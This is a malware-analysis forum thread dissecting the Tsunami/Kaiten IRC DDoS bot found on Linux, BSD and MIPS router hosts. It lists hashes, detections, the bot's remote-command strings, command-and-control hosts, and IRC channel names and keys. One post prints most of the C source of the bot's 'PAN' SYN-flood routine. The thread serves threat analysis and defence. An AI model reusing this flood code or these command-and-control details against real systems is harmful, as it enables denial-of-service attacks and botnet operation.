A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19487  by unixfreaxjp
 Thu May 30, 2013 1:45 pm
Found & handling a range of FreeBSD & Linux machines infected with this trojan.
Is a compiled ELF/x32 on a successful hacked machine.
Compilation traced to gcc, Linux is main target, xBSD or other *NIX system supported Linux compatibility also can be affected.
It was faking bash as "-bash" in process (ps) at xBSD which doesn't used that shell so it was spotted easily.

VT Summary: (LINK)
Code: Select all
SHA256: 6e4586e5ddf44da412e05543c275e466b9da0faa0cc20ee8a9cb2b2dfd48114e
SHA1: 13aa008b0f3c9e92450979ee52cb46accf49aff3
MD5: 6547b92156b39cb3bb5371b17d2488f2
File size: 18.5 KB ( 18902 bytes )
File name: -bash
File type: ELF
Tags: elf
Detection ratio: 7 / 47
Analysis date: 2013-05-30 11:37:36 UTC ( 4 minutes ago )
F-Secure                 : Generic.Malware.IFg.985D9435
GData                    : ELF:Tsunami-L
MicroWorld-eScan         : Generic.Malware.IFg.985D9435
Avast                    : ELF:Tsunami-L [Trj]
Kaspersky                : Backdoor.Linux.Tsunami.gen
BitDefender              : Generic.Malware.IFg.985D9435
Emsisoft                 : Generic.Malware.IFg.985D9435 (B)
Summary of this trojan:
Code: Select all
1. Usage the INET socket to make internet connection via IRC, HTTP or FTP
2. Locking itself in specific PID to avoid double starts/killed.
3. Forking support functionalities.
4. Remote control Bot-IRC functions like:
 a. Remote FTP access for infecting further
 b. Commands like:  NICK, SERVER, KILL, GET, HELP, ETC, SH; are the basic commmands used
 c. Custom commands like; _352, _376, _433 for botnet comm purpose.
  d. Flooding (DoS/DDoS) tools.
IMPORTANT! Flooding Operation is implemented in the program, w/ below HTTP header:
Code: Select all
       GET /%s HTTP/1.0\
        Connection: Keep-Alive
        User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
        Host: %s:80\
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
        Accept-Encoding: gzip\r\nAccept-Language: en
        Accept-Charset: iso-8859-1,*,utf-8
            (Following by long characters assembled/sent from botmaster via IRC)
The sample making IRC connection to the below host:
Code: Select all
And tried to download from below hosts by FTP:
Code: Select all
Hostname: wf.networksolution.com
Locking PID:
Code: Select all
// PID hooks:
Lockfile found. Exiting.
- bash // malware process..
IRC commands used (it used IDENT):
Code: Select all
PRIVMSG %s :Receiving file.
PRIVMSG %s :Saved as %s
PRIVMSG %s :NICK <nick>
PRIVMSG %s :Nick cannot be larger than 9 characters.
PRIVMSG %s :Unable to resolve %s
PRIVMSG %s :MOVE <server>
NOTICE %s :NICK <nick>                    = Changes the nick of the client
NOTICE %s :SERVER <server>                = Changes servers
NOTICE %s :KILL                           = Kills the client
NOTICE %s :GET <http address> <save as>   = Downloads a file off the web and saves it onto the hd
NOTICE %s :HELP                           = Displays this
NOTICE %s :IRC <command>                  = send_msgs this command to the server
NOTICE %s :SH <command>                   = Executes a command
PRIVMSG %s :%s
MODE %s -ix
JOIN %s :%s
WHO %s
PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
Logged on connectivity effort:
Code: Select all
// for IRC....
tcp4       0      0 x.x.x.x.59314    SYN_SENT
tcp4       0      0 x.x.x.x.60606    SYN_SENT
tcp4       0      0 x.x.x.x.46914    SYN_SENT
tcp4       0      0 x.x.x.x.53001    SYN_SENT
tcp4       0      0 x.x.x.x.50123    SYN_SENT
tcp4       0      0 x.x.x.x.36833    SYN_SENT
Active Internet connections
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
// for FTP....
tcp4       0      0 x.x.x.x.64873     wf.networksoluti.ftp   SYN_SENT
tcp4       0      0 x.x.x.x.64873     wf.networksoluti.ftp   SYN_SENT
More details analysis is in >> This Link
 #19494  by unixfreaxjp
 Thu May 30, 2013 6:12 pm
Thank's for the info. I checked the page & chat with the owner.
The fact is: we don't know for sure. do we?
Yes I saw some similarities, but that "could be" another variant. yes?
i.e. jarmoc.com's reported case was Linux, and no binary compiled report/hash on that. I need to see something to compare to be confirmed/sure.
 #19496  by bsteo
 Thu May 30, 2013 10:14 pm
Is that one for sure and "that one" being a slight modification of better known "kaiten.c" aka Kaiten a Linux/Unix DDOS IRC bot.
 #19504  by unixfreaxjp
 Fri May 31, 2013 3:56 am
exitthematrix wrote:Is that one for sure and "that one" being a slight modification of better known "kaiten.c" aka Kaiten a Linux/Unix DDOS IRC bot.
I wish I knew this fact BEFORE I reversed them - sigh - what a waste of time..
 #23810  by unixfreaxjp
 Sun Sep 07, 2014 12:39 am
New & fresh sample, this time is in MIPS router (hacked) using stripped ELF:
Code: Select all
poke.sh: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0xf41 = 0x756e6700, with unknown capability 0x70100 = 0x3040000, stripped
Typical identification:
Code: Select all
0x0143C8    NOTICE %s :Kaiten wa goraku
0x0146F0    NOTICE %s :TSUNAMI <target> <secs>
It's an additional (modded) version from the original one, using "PAN" attack command, in this db:
Code: Select all
 aNoticeSPanTarg:.ascii "NOTICE %s :PAN <target> <port> <secs>\n"<0>
Called from here:
Code: Select all
.text:0x402740 lw      $a0, 0x128+arg_0($fp)
.text:0x402744 lui     $v0, 0x41
.text:0x402748 addiu   $a1, $v0, (aNoticeSPanTarg - 0x410000); <====HERE!
.text:0x40274C lw      $a2, 0x128+arg_4($fp)
.text:0x402750 jal     sub_400558
.text:0x402754 nop
Details are in VT comment; https://www.virustotal.com/en/file/0173 ... 409864439/
CNC info are in "usual" format, using DDNS domain service to cover the takedown, decompiled code:
Code: Select all
char *servers「」 = {
(void*) 0  }; 
Alive NOW in :
Code: Select all
Germany IPs:
Code: Select all|ip-241-177-143-79.static.contabo.net.|51167 | | CONTABO | DE | CONTABO.DE | CONTABO GMBH|eichwalde.de.|6724 | | STRATO | DE | STRATO.DE | STRATO AG

Channel & Auth used:
Code: Select all
.text:0x40535C la      $v0, 0x4274BC
.text:0x405360 la      $v1, aCore       # "#core"
.text:0x405368 sw      $v1, 0($v0)
.text:0x40536C la      $v0, 0x4274B8
.text:0x405370 la      $v1, aBleh       # "bleh"
.text:0x405378 sw      $v1, 0($v0)
Modded by south asian crook/skids likely (language trace of the auth)
/* Please support our ELF malware OP #MalwareMustdie! Share us samples */
You do not have the required permissions to view the files attached to this post.
 #23811  by unixfreaxjp
 Sun Sep 07, 2014 8:26 am
So this is what the PAN attack is all about..
Code: Select all
void pan(int sock, char *sender, int argc, char **argv) {
        struct send_tcp send_tcp;
        struct pseudo_header pseudo_header;
        struct sockaddr_in sin;
        unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
        unsigned int psize=20, source, dest, check;
        unsigned long saddr, daddr,secs;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 3) {
                Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
        Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
        send_tcp.ip.ihl = 5;
        send_tcp.ip.version = 4;
        send_tcp.ip.tos = 16;
        send_tcp.ip.frag_off = 64;
        send_tcp.ip.ttl = 64;
        send_tcp.ip.protocol = 6;
        send_tcp.tcp.ack_seq = 0;
        send_tcp.tcp.doff = 10;
        send_tcp.tcp.res1 = 0;
        send_tcp.tcp.cwr = 0;
        send_tcp.tcp.ece = 0;
        send_tcp.tcp.urg = 0;
        send_tcp.tcp.ack = 0;
        send_tcp.tcp.psh = 0;
        send_tcp.tcp.rst = 0;
        send_tcp.tcp.fin = 0;
        send_tcp.tcp.syn = 1;
        send_tcp.tcp.window = 30845;
        send_tcp.tcp.urg_ptr = 0;
        while(1) {
                if (atoi(argv[2]) == 0) dest=rand();
                send_tcp.ip.tot_len = htons(40+psize);
                send_tcp.ip.id = rand();
                send_tcp.ip.saddr = saddr;
                send_tcp.ip.daddr = daddr;
                send_tcp.ip.check = 0;
                send_tcp.tcp.source = source;
                send_tcp.tcp.dest = dest;
                send_tcp.tcp.seq = rand();
                send_tcp.tcp.check = 0;
                sin.sin_family = AF_INET;
                sin.sin_port = dest;
                sin.sin_addr.s_addr = send_tcp.ip.daddr;
                send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
                check = rand();
                pseudo_header.source_address = send_tcp.ip.saddr;
                pseudo_header.dest_address = send_tcp.ip.daddr;
                pseudo_header.placeholder = 0;
                pseudo_header.protocol = IPPROTO_TCP;
                pseudo_header.tcp_length = htons(20+psize);
                bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
                bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
                send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
                sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
                if (a >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
 #23895  by unixfreaxjp
 Tue Sep 16, 2014 12:14 pm
New samples on x32, x64, ARM and PPC!!
x32: https://www.virustotal.com/en/file/0e00 ... 410863138/
x64: https://www.virustotal.com/en/file/c2af ... 410863369/
ARM: https://www.virustotal.com/en/file/4730 ... 405408109/
PPC: https://www.virustotal.com/en/file/7094 ... 408727660/
Thank's to Malekal for the contribution.
It's the version with the PAN attack (v2), case is under investigation so I can not say much.
You do not have the required permissions to view the files attached to this post.
 #23977  by unixfreaxjp
 Tue Sep 23, 2014 6:25 pm
New sample x32 https://www.virustotal.com/en/file/0e00 ... 411122356/
Code: Select all
.rodata:0x04C2A0  db  65h ; e
.rodata:0x04C2A1  db  6Eh ; n
.rodata:0x04C2A2  db  64h ; d
.rodata:0x04C2A3  db  69h ; i
.rodata:0x04C2A4  db  6Eh ; n
.rodata:0x04C2A5  db  67h ; g
.rodata:0x04C2A6  db  2Eh ; .
.rodata:0x04C2A7  db  70h ; p
.rodata:0x04C2A8  db  75h ; u
.rodata:0x04C2A9  db  62h ; b
.rodata:0x04C2AA  db  6Ch ; l
.rodata:0x04C2AB  db  69h ; i
.rodata:0x04C2AC  db  63h ; c
.rodata:0x04C2AD  db  76h ; v
.rodata:0x04C2AE  db  6Dh ; m
.rodata:0x04C2AF  db  2Eh ; .
.rodata:0x04C2B0  db  63h ; c
.rodata:0x04C2B1  db  6Fh ; o
.rodata:0x04C2B2  db  6Dh ; m
Channel and channel auth:
Code: Select all
mov     ds:chan, offset aBorgir ; "#Borgir"
.mov     ds:key, offset aP06tain ; "p06tain"
You do not have the required permissions to view the files attached to this post.